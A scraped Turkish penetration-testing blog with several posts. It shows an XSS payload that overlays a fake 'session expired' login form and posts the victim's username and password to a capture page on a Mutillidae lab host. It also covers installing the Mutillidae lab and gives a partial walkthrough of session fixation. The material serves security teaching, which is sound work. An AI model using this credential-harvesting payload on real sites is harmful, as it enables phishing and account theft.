<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgz8dbpxbqNPVC1fmy_zW5xtKKbcldDvzr9JXWKlxaXx07MrD7H9gzzYO0TMq6MP0RVTLWf4mIGLI2Kk4i0kDh_RFecFcb05HdPpOfEynkYqsDRPNCnx9UAGd6Kkb7ufYtYcXQtdd-CdX8/s1600/h1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgz8dbpxbqNPVC1fmy_zW5xtKKbcldDvzr9JXWKlxaXx07MrD7H9gzzYO0TMq6MP0RVTLWf4mIGLI2Kk4i0kDh_RFecFcb05HdPpOfEynkYqsDRPNCnx9UAGd6Kkb7ufYtYcXQtdd-CdX8/s1600/h1.png" height="193" width="400" /></a></div>
<br />
<br />
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">Bu örneği görelim.</span><br />
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"></span><br />
<a name='more'></a><span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwM5IWGhztHTNoFfg0VnuF3CGIrCDekeRGqM1XKcCYUI1SRH3VlQ2FQBwBGMWFMGyi7GPe64assTh-h0kblSqLmtZhSVR1HhURW-E9F2GFxkeJcvmsrKZqNhaBXekxE0Q5JhwJkeE26tI/s1600/h2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwM5IWGhztHTNoFfg0VnuF3CGIrCDekeRGqM1XKcCYUI1SRH3VlQ2FQBwBGMWFMGyi7GPe64assTh-h0kblSqLmtZhSVR1HhURW-E9F2GFxkeJcvmsrKZqNhaBXekxE0Q5JhwJkeE26tI/s1600/h2.png" height="206" width="400" /></a></div>
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">Yukarıdaki resimde cookie bilgilerini hacker kendi sayfasına yolluyor. Ama aşağıdaki örnekte bu sefer ziyaretçilerin karşısına sanki session bilgisi düşmüş-yenilenmiş gibi login ekranı çıkartılır ve username-password bilgisi istenir.</span><br />
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9BJZiYpRTNShsQKqh9pLmGTgu3ANa_AcdDBPek7jwi63xipIwIa7uvz8HnRC7Kt-q3iwag0hLmReEg7__5blXOgTFv77AmzTI9EIWywk-H4X2XV-zkOENNc6VPYobMtTNw4OzqFNhW-Q/s1600/h3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9BJZiYpRTNShsQKqh9pLmGTgu3ANa_AcdDBPek7jwi63xipIwIa7uvz8HnRC7Kt-q3iwag0hLmReEg7__5blXOgTFv77AmzTI9EIWywk-H4X2XV-zkOENNc6VPYobMtTNw4OzqFNhW-Q/s1600/h3.png" height="195" width="400" /></a></div>
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span>
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span>
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">Aşağıda çıktısını görelim. Submit butonunun işlevine username ve password bilgilerini istenilen sunucuya gönderilirse üyenin bilgileri çalınmış olunur. Basit bir yorum alanından ziyeretçilerin üyelik bilgileri çalınabilinir.</span><br />
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkQqHFMqLXbRb7oINsWS9bQnWIN8m0_n1IqFNrVc3r_Lg0GTOBbXmqxXELuiCnou5vAuPbcrZTsljL3NU3c9EsAjVW862LXR2Y_qNNTbn9q5XcGbyZGPuSndLfzHAiyfsZBkYy34q-hNA/s1600/h4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkQqHFMqLXbRb7oINsWS9bQnWIN8m0_n1IqFNrVc3r_Lg0GTOBbXmqxXELuiCnou5vAuPbcrZTsljL3NU3c9EsAjVW862LXR2Y_qNNTbn9q5XcGbyZGPuSndLfzHAiyfsZBkYy34q-hNA/s1600/h4.png" height="280" width="400" /></a></div>
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span>
<br />
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Javascript-Html kodları aşağıdaki gibidir.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<div id="modal" style="position:fixed;top:0;left:0;width:100%;height:100%;background-color:black;opacity:.5;z-index:999998;">&nbsp;</div><br />
<div style="margin:5% auto;width:100%;position:fixed;top:5%;left:5%;z-index:9999999;"><br />
<div id="idlogin" style="width:405px;position:relative;margin:0 auto;background-color:white;padding:10px;border:1px solid black;"><br />
<script><br />
function capture(theForm){<br />
var lXMLHTTP;<br />
try{<br />
var lData = "username=" + theForm.username.value + "&password=" + theForm.password.value;<br />
var lHost = "localhost";<br />
var lProtocol = "http";<br />
var lAction = lProtocol + "://" + lHost + "/mutillidae/capture-data.php";<br />
var lMethod = "post";<br />
try{<br />
lXMLHTTP = new ActiveXObject("Msxml2.XMLHTTP");<br />
}catch (e){<br />
try{<br />
lXMLHTTP = new ActiveXObject("Microsoft.XMLHTTP");<br />
}catch(e) {<br />
try{<br />
lXMLHTTP = new XMLHttpRequest();<br />
}catch (e) {</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
};//end try<br />
};//end try<br />
};//end try</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
lXMLHTTP.onreadystatechange = function(){</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br />
if(lXMLHTTP.readyState == 4){<br />
theForm.parentNode.style.display="none";<br />
}// end if<br />
};</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
lXMLHTTP.open(lMethod, lAction, true);<br />
lXMLHTTP.setRequestHeader("Host", lHost);<br />
lXMLHTTP.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");<br />
lXMLHTTP.send(lData);<br />
}catch(e){</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
alert(e.message);</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
//THIS LINE IS TESTING AND DEMONSTRATION ONLY. DO NOT INCLUDE IN PEN TEST.<br />
};</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
};//end function<br />
</script><br />
<form><br />
<table style="font-weight:bold;"><br />
<tbody></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<tr></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<td colspan="2" style="font-size:20px;">Sorry! Your session has expired.<br><br>Please login again.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
</td></tr><br />
<tr></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<td colspan="2">&nbsp;</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
</td></tr><br />
<tr><td>Username</td><td><input name="username" type="text"></td></tr><br />
<tr><td>Password</td><td><input name="password" type="password"></td></tr><br />
<tr><td colspan="2" style="text-align:center;"><input type="button" onclick="javascript:capture(this.form);" value=" Submit "></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
</td></tr><br />
</tbody></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
</table><br />
</form><br />
</div></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span>Pentesttrhttp://www.blogger.com/profile/17047185388431875520noreply@blogger.com0tag:blogger.com,1999:blog-9189801013696365858.post-77028426192766484842014-09-30T11:13:00.000+03:002016-02-05T21:51:57.901+02:00OWASP Nedir? OWASP Web Uygulaması Kurulumu ve Kullanımı-1<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<a data-mce-href="http://fbhportal.com/mutillidae" href="http://fbhportal.com/mutillidae">OWASP</a>, Open Web Application Security Project’nin kısaltılmış halidir. Açık web uygulama güvenliği projesi anlamına gelen OWASP, güvensiz yazılımların oluşturduğu problemlere karşı mücadele etmek için kurulmuş bir topluluktur. OWASP’ın tüm araçları, dokümanları, listeleri, ve bölümleri ücretsiz olarak her yazılım güvenliği çalışanı ve meraklısına sunulmuştur.</div>
<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
OWASP hiç bir teknoloji şirketine bağlı olmayıp OWASP topluluğun ihtiyaçlarını karşılamak için kurulmuştur.2013 yılı için zafiyet top 10 listesi aşağıdaki gibidir.</div>
<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEge_fS9WYdlDDFXQR0gUTIZzNZRBrrF-gc74j8ck2H3WmXrneWVJarmJY8AbzJloSw-UjXx4RMwfgSzTA7RgyQrodZSqkH7qFVdsQQDkF9cCTUXDOpekw0Rw4RuJXyPHKy14RFUmC61Lec/s1600/o1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="208" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEge_fS9WYdlDDFXQR0gUTIZzNZRBrrF-gc74j8ck2H3WmXrneWVJarmJY8AbzJloSw-UjXx4RMwfgSzTA7RgyQrodZSqkH7qFVdsQQDkF9cCTUXDOpekw0Rw4RuJXyPHKy14RFUmC61Lec/s1600/o1.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<a name='more'></a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<strong>OWASP</strong>, web uygulamalarında karşımıza çıkan bu açıklıkları gerek açıklıkların tanıtılması gerekse de pentest alanında deneyim kazanmak için uğraş veren kişilere bir test alanı hazırlamak için bu web uygulamasını gerçekleştirmiştir.</div>
<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
DVWA web test uygulamasına göre daha kapsamlı ve dokümantasyon olarak daha zengin kaynaklıdır. Ayrıca OWASP var olan açıklıkları yenileyerek web uygulamasını zenginleştirmektedir.</div>
<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<strong>OWASP Web Uygulamasının Kurulumu</strong></div>
<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
1- <a data-mce-href="http://sourceforge.net/projects/mutillidae/files/mutillidae-project/" href="http://sourceforge.net/projects/mutillidae/files/mutillidae-project/" target="_blank">Bu adresten</a> mutillidae adındaki zip dosyayı indirin.</div>
<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
2-<a data-mce-href="https://www.apachefriends.org/download.html" href="https://www.apachefriends.org/download.html" target="_blank">Bu adrestende</a> XAMP server programını indirin.</div>
<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
3-XAMP programının kurulumu yapıldıktan sonra <strong>httpd</strong> klasörünün içine .zip'ten çıkarılan <strong>mutillidae</strong> dosyası aktarılır.</div>
<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
4- <strong>http://localhost/mutillidae</strong> adresine gidince<strong> Setup/reset the database</strong> linkine tıklanır.</div>
<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXCEgk6LuqG27xr588henfbo1ofFbC6d04oBjC6FmQ3UMYl_QM6kD4zzWiDiTRSXWc67zgO-SyRcs7L4X3s-_AqR_oTWZpVxJWa9Dwm25m58kbWEWLklS2Iyc_zTW35YTVDYovki8Qte0/s1600/o2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXCEgk6LuqG27xr588henfbo1ofFbC6d04oBjC6FmQ3UMYl_QM6kD4zzWiDiTRSXWc67zgO-SyRcs7L4X3s-_AqR_oTWZpVxJWa9Dwm25m58kbWEWLklS2Iyc_zTW35YTVDYovki8Qte0/s1600/o2.png" width="400" /></a></div>
<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">5-Tekrar </span><strong style="background-color: white;">http://localhost/mutillidae</strong><span style="background-color: white;"> adresine gidince uygulama kurulmuş olur.</span></div>
<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: white;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9v_5bqaW1x5pfEJKL5JlkYe8aFglOmKzR1yATmvFpDx5D19ZdamFIBH1tbwKtaeCMXuKtAzi8LE2HWNXa0I4T4oVV8TDWAGOIeOICKWQYPl2ZirfQmeR_J9iU81IaWhJHO4e-cRLhn9c/s1600/o3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="183" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9v_5bqaW1x5pfEJKL5JlkYe8aFglOmKzR1yATmvFpDx5D19ZdamFIBH1tbwKtaeCMXuKtAzi8LE2HWNXa0I4T4oVV8TDWAGOIeOICKWQYPl2ZirfQmeR_J9iU81IaWhJHO4e-cRLhn9c/s1600/o3.png" width="400" /></a></div>
<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: white;"><br /></span></div>
<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<strong>Login işlemi için kullanıcı listesi</strong></div>
<ol style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<li> 'admin', 'adminpass'</li>
<li>'adrian', 'somepassword'</li>
<li>'john', 'monkey'</li>
<li>'ed', 'pentest'</li>
</ol>
<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<strong>WAMP Server ile Kurulumu;</strong></div>
<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
WAMP server programı kurulur ve veritabanı bölümünden<strong> "nowasp"</strong> adında bir veritabanı oluşturulur. Zip ten çıkarılan dosya <strong>/www</strong> klasörünün içine atılır.</div>
<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3DblGu1ShiWPo_SdS1WG-VTWDOLkFMBVx5AYt3CFm_N9TztWAAN3rI6T-BYn1zNJPblRmelYs9NLXcCJ34dE_1pF_U5vj_DtxJ_v7kj0IDdePncjIvM-5LU-DUrBOQz9XgEQb3cRv8yA/s1600/o4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="173" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3DblGu1ShiWPo_SdS1WG-VTWDOLkFMBVx5AYt3CFm_N9TztWAAN3rI6T-BYn1zNJPblRmelYs9NLXcCJ34dE_1pF_U5vj_DtxJ_v7kj0IDdePncjIvM-5LU-DUrBOQz9XgEQb3cRv8yA/s1600/o4.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">Yukarıdaki gibi hata alınırsa "</span><strong style="background-color: white;">C:\wamp\www\mutillidae1\classes</strong><span style="background-color: white;">" adres gidip </span><strong style="background-color: white;">MySQlHandler.php</strong><span style="background-color: white;"> dosyasında aşağıdaki resimde </span><strong style="background-color: white;">"static public $mMySQLDatabasePassword = " "; "</strong><span style="background-color: white;"> alana </span><strong style="background-color: white;">MYSQL</strong><span style="background-color: white;"> parolası yazılır.</span></div>
<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: white;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVLppFxlOo89BKZrWVoa8fqBl6Gobj_XHF12eckmX-H1UsSL9CZ0C9CbZFe9d73isxU9tOr5EPC8k_KY7ZAhgvltMxOZrTNXRgwhVc6S9hYZXnKZileC9jzb4NwgefLlDsKBY7L0ZDojA/s1600/o5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVLppFxlOo89BKZrWVoa8fqBl6Gobj_XHF12eckmX-H1UsSL9CZ0C9CbZFe9d73isxU9tOr5EPC8k_KY7ZAhgvltMxOZrTNXRgwhVc6S9hYZXnKZileC9jzb4NwgefLlDsKBY7L0ZDojA/s1600/o5.png" width="392" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">Sayfayı yenileyince hata ortadan kalkar.</span><strong style="background-color: white;"> Reset/setup the database</strong><span style="background-color: white;"> linkine tıklayınca kurulum tamamlanır.</span></div>
<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
Pentesttrhttp://www.blogger.com/profile/17047185388431875520noreply@blogger.com0tag:blogger.com,1999:blog-9189801013696365858.post-85908735368719804142014-09-30T11:06:00.001+03:002014-10-24T14:34:55.137+03:00Session Fixation(Oturum Sabitleme) Saldırısının Test Edilmesi<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<strong style="background-color: white; color: #333333;">Session Fixation(Oturum Sabitleme)</strong><span style="background-color: white; color: #333333;"> saldırısı, herhangi bir web sitesine giriş yaparken tarayıcının veya sitenin bize sunmuş olduğu </span><strong style="background-color: white; color: #333333;">"Oturum id-Session id"</strong><span style="background-color: white; color: #333333;"> bilgisinin açıklığından kaynaklanır.Siteye login olurken bize tahsis edilen Session id değeri ile login olduktan sonra tahsis edilen Session id değerinin </span><strong style="background-color: white; color: #333333;">aynı olmasından</strong><span style="background-color: white; color: #333333;"> dolayı bu saldırı başarılı olur.Saldırgan bize farklı bir Session id değeri ile sitede dolaşmamızı(siteye saldırganın yolladığı session id yi kabul ettirmeyi) sağlayarak saldırıyı gerçekleştirir.Başarılı olan bu saldırıyı ile saldırgan login olmadan bizim bilgilerimizle sitede işlem gerçekleştirir.</span></div>
<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4lcP5zO2yKplqBDUyHSX2_2WRTBqXXVYWUfKkA8CtjFLyx7yDSZHQ4KwOKRu4THfX1-VIOy3T_jKYAhvxphou7Y3hKfl4HUbdWeHWWe-H5bh7p6iD2HH6o3Qv9zStL-HhkjJnAxo8Qnc/s1600/s1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4lcP5zO2yKplqBDUyHSX2_2WRTBqXXVYWUfKkA8CtjFLyx7yDSZHQ4KwOKRu4THfX1-VIOy3T_jKYAhvxphou7Y3hKfl4HUbdWeHWWe-H5bh7p6iD2HH6o3Qv9zStL-HhkjJnAxo8Qnc/s1600/s1.png" height="327" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Şimdi adım adım bu saldırıyı gerçekleştirelim.<br />
<br />
<a name='more'></a><br /></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<strong>Aşama-1:</strong> Kurban siteye login olur.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRRWOc-VVQxDuJECrMqqNOLvDhJMVHg9uYPQ9YDIrT1I6-r9eypaR8Z6aRcyfZvWecFL4B3RqPr5iSipGUN-aZ3NFgPO6xBR_KUzi-v2V-yiqNyqXIqJjnVtpdQlO3BysQx6t-wThjmb8/s1600/s2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRRWOc-VVQxDuJECrMqqNOLvDhJMVHg9uYPQ9YDIrT1I6-r9eypaR8Z6aRcyfZvWecFL4B3RqPr5iSipGUN-aZ3NFgPO6xBR_KUzi-v2V-yiqNyqXIqJjnVtpdQlO3BysQx6t-wThjmb8/s1600/s2.png" height="260" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<strong style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">Aşama-2:</strong><span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"> Site kullanıcı için bir session id değeri üretir.</span></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiETlhyphenhyphenk1IyvUY2v8am1t0d3UmA0bbNV_W9RWiue2Tts44_q5zHEbjWV5lNzWU9CmSt3BTc-_LrRnNdwQq1qlrJHFtzQVMRTsiGVpidPEteAj1MBP1SN_W5CmeDV-10_aBfINAPrxwVWZQ/s1600/s3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiETlhyphenhyphenk1IyvUY2v8am1t0d3UmA0bbNV_W9RWiue2Tts44_q5zHEbjWV5lNzWU9CmSt3BTc-_LrRnNdwQq1qlrJHFtzQVMRTsiGVpidPEteAj1MBP1SN_W5CmeDV-10_aBfINAPrxwVWZQ/s1600/s3.png" height="141" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<strong style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">Aşama-3:</strong><span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"> Kurban sitede dolaşırken Session Id değeri aynıdır.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVRBPLOcwwFEVrc9dhxt141iZ59bRHnGZHgS4GvlvCj_hBIkV-F1E-SHqTxat2apdDKVOTUB9FR8FOUZsBgzpKzmJmTop6r1zBlod25Cg5MsxZg_B9j93SPNCXaPFq1r1OzgB0DUzqaBE/s1600/s4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVRBPLOcwwFEVrc9dhxt141iZ59bRHnGZHgS4GvlvCj_hBIkV-F1E-SHqTxat2apdDKVOTUB9FR8FOUZsBgzpKzmJmTop6r1zBlod25Cg5MsxZg_B9j93SPNCXaPFq1r1OzgB0DUzqaBE/s1600/s4.png" height="26" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
